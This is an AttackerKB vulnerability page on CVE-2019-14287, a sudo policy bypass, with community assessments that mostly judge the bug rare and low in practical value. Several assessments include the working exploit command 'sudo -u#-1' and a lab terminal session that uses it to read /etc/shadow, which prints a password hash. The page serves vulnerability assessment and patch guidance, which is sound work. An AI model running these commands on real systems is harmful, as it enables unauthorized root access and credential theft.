Low
CVE-2019-14287
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2019-14287
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a “sudo -u #$((0xffffffff))” command.
Add Assessment
Ratings
-
Attacker ValueVery Low
-
ExploitabilityVery High
Technical Analysis
Due to being almost 100% non-existent in the wild, this is only useful in CTF environments. The exploit is extremely easy to trigger, and I weep for the machine that has this configured in the wild.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueLow
-
ExploitabilityVery High
Technical Analysis
While this is easy to exploit and low risk to the stability of the target system, it is post-exploitation, and highly dependent on a relatively uncommon and paranoid type of configuration where an administrator is actively monitoring trusted or untrusted users on a multi-user system. There may be some way to leverage this as a primitive for a different kind of exploit chain, but more often than not users are allowed to just pivot into root directly, or specific privileged executables are escalated with setuid rather than sudo.
Someone somewhere has a that golden target, and is having a field day. Everyone else had root anyway :)
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportOther related vuln possibilities could be auditing everything that checks UID_MAX / GID_MAX to see if seteuid/setegid failures are detected.
useradd
doesn’t detect a problem on Linux but adduser
does
/usr/sbin/useradd -d /home/bcook-max -g bcook -s /bin/bash -u 4294967295 bcook-max useradd: invalid user ID '4294967295'
vipw
is fine with this uid, but su fails
# grep max /etc/passwd bcook-max:x:4294967295:1000::/home/bcook-max:/bin/bash ~ # su - bcook-max su: cannot set user id: Invalid argument
Completely agree. Just like Brent, when I first saw the OMG!!!! Sudo bypass as easy as ‘-u’ I was super concerned, so I tried it out on a fairly stock Ubuntu, a popular Linux distro, and got:
> sudo -u -1 id sudo: unknown user: -1 sudo: unable to initialize policy plugin > sudo -u 4294967295 id sudo: unknown user: 4294967295 sudo: unable to initialize policy plugin
Then I got to the penultimate line of the article I was reading where it said “Since the attack works in a specific use case scenario of the sudoers configuration file, it should not affect a large number of users.”
Come on, people; be honest. Put that line in your opening paragraph! Should you patch? Yes! Should you be concerned this has torn through your mostly stock servers? Nope. The hype this got was way disproportional to the threat. There are far more scary privilege escalations for Linux out there, and this one is pretty easy to patch.
Ratings
-
Attacker ValueLow
-
ExploitabilityVery High
Technical Analysis
I’ve seen Runas
specifications on exactly two servers in the wild. I think it’s even rarer that you would specify ALL
and !root
in the same specification, though it is a better application of the principle of least privilege.
More importantly, privilege escalation is contingent on having access to a command that can escape to a shell or otherwise execute arbitrary code or commands. Cool bug, but the use case for this is minimized.
Here’s a contrived example of the bug in action:
vagrant@ubuntu-xenial:~$ sudo -l Matching Defaults entries for vagrant on ubuntu-xenial: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User vagrant may run the following commands on ubuntu-xenial: (ALL, !root) NOPASSWD: /usr/bin/whoami vagrant@ubuntu-xenial:~$ sudo whoami [sudo] password for vagrant: Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial. vagrant@ubuntu-xenial:~$ sudo -u ubuntu whoami ubuntu vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami root vagrant@ubuntu-xenial:~$
You must specify #
to use a UID.
Here’s another example where you’re not limited to a command, only the target users:
vagrant@ubuntu-xenial:~$ sudo -l Matching Defaults entries for vagrant on ubuntu-xenial: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User vagrant may run the following commands on ubuntu-xenial: (ALL, !root) NOPASSWD: ALL vagrant@ubuntu-xenial:~$ sudo whoami [sudo] password for vagrant: Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial. vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami root vagrant@ubuntu-xenial:~$ sudo -u#-1 cat /etc/shadow root:*:17897:0:99999:7::: daemon:*:17897:0:99999:7::: bin:*:17897:0:99999:7::: sys:*:17897:0:99999:7::: sync:*:17897:0:99999:7::: games:*:17897:0:99999:7::: man:*:17897:0:99999:7::: lp:*:17897:0:99999:7::: mail:*:17897:0:99999:7::: news:*:17897:0:99999:7::: uucp:*:17897:0:99999:7::: proxy:*:17897:0:99999:7::: www-data:*:17897:0:99999:7::: backup:*:17897:0:99999:7::: list:*:17897:0:99999:7::: irc:*:17897:0:99999:7::: gnats:*:17897:0:99999:7::: nobody:*:17897:0:99999:7::: systemd-timesync:*:17897:0:99999:7::: systemd-network:*:17897:0:99999:7::: systemd-resolve:*:17897:0:99999:7::: systemd-bus-proxy:*:17897:0:99999:7::: syslog:*:17897:0:99999:7::: _apt:*:17897:0:99999:7::: lxd:*:17897:0:99999:7::: messagebus:*:17897:0:99999:7::: uuidd:*:17897:0:99999:7::: dnsmasq:*:17897:0:99999:7::: sshd:*:17897:0:99999:7::: pollinate:*:17897:0:99999:7::: vagrant:$6$pjYWAc.5$QYfO.wN80gnGe2kC1jYmSTGmO/qelG1CMl6ubKMbDQt9b1TEKZ648PQGI7VC88XE3ObdPBswUavsC1eDVZunJ.:17897:0:99999:7::: ubuntu:!:18100:0:99999:7::: vagrant@ubuntu-xenial:~$
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueVery Low
-
ExploitabilityVery High
Technical Analysis
Patch, but don’t freak out.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueVery Low
-
ExploitabilityVery High
Technical Analysis
As many others before me have stated, this CVE hold very little use other than in CTF environments.
To spot this vuln, look for a configuration similar to this one in the /etc/sudoers
file:
<user> ALL=(ALL:!root) NOPASSWD: ALL
If the sudo version is below 1.8.28, and the above configuration is present, you can exploit as follows:
sudo -u#-1 <command>
You can also use the unsigned equivalent of -1: 4294967295
.
To test this bug in a preconfigured environment, check out https://tryhackme.com/room/sudovulnsbypass .
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- canonical,
- debian,
- fedoraproject,
- netapp,
- opensuse,
- redhat,
- sudo project
Products
- debian linux 10.0,
- debian linux 8.0,
- debian linux 9.0,
- element software management node -,
- enterprise linux 8.0,
- enterprise linux desktop 6.0,
- enterprise linux desktop 7.0,
- enterprise linux eus 7.5,
- enterprise linux eus 7.6,
- enterprise linux eus 7.7,
- enterprise linux eus 8.1,
- enterprise linux eus 8.2,
- enterprise linux eus 8.4,
- enterprise linux server 5.0,
- enterprise linux server 6.0,
- enterprise linux server 7.0,
- enterprise linux server aus 6.5,
- enterprise linux server aus 6.6,
- enterprise linux server aus 7.2,
- enterprise linux server aus 7.3,
- enterprise linux server aus 7.4,
- enterprise linux server aus 7.6,
- enterprise linux server aus 7.7,
- enterprise linux server aus 8.2,
- enterprise linux server aus 8.4,
- enterprise linux server tus 7.2,
- enterprise linux server tus 7.3,
- enterprise linux server tus 7.4,
- enterprise linux server tus 7.6,
- enterprise linux server tus 7.7,
- enterprise linux server tus 8.2,
- enterprise linux server tus 8.4,
- enterprise linux workstation 6.0,
- enterprise linux workstation 7.0,
- fedora 29,
- fedora 30,
- fedora 31,
- leap 15.0,
- leap 15.1,
- openshift container platform 4.1,
- sudo,
- ubuntu linux 12.04,
- ubuntu linux 14.04,
- ubuntu linux 16.04,
- ubuntu linux 18.04,
- ubuntu linux 19.04,
- virtualization 4.2
References
Advisory
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: